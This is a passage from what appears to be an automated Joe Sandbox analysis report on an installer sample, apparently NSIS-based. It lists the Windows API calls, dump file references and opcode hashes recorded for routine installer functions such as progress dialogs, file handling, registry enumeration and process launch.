                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(?,?,?), ref: 00402E87
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                          • String ID: ... %d%%
                                                                                                          • API String ID: 722711167-2449383134
                                                                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                          • wsprintfW.USER32 ref: 004067A4
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                          • wsprintfW.USER32 ref: 00402E45
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                          • wsprintfW.USER32 ref: 00404CB6
                                                                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s$(7B
                                                                                                          • API String ID: 3540041739-1320723960
                                                                                                          • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                          • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                          • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                          • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1941528284-0
                                                                                                          • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                          • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 3808545654-0
                                                                                                          • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                          • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                          • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                          APIs
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$Enum
                                                                                                          • String ID:
                                                                                                          • API String ID: 464197530-0
                                                                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                          • GetLastError.KERNEL32 ref: 00405976
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                          • GetLastError.KERNEL32 ref: 00405995
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 3449924974-0
                                                                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                          APIs
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0,00000000), ref: 00405D76
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0,00000000), ref: 00405E1E
                                                                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0), ref: 00405E2E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                          • String ID: 0_B
                                                                                                          • API String ID: 3248276644-2128305573
                                                                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,74DF3420,004036EF), ref: 00405F46
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                          • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                          • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 004059E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                          • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
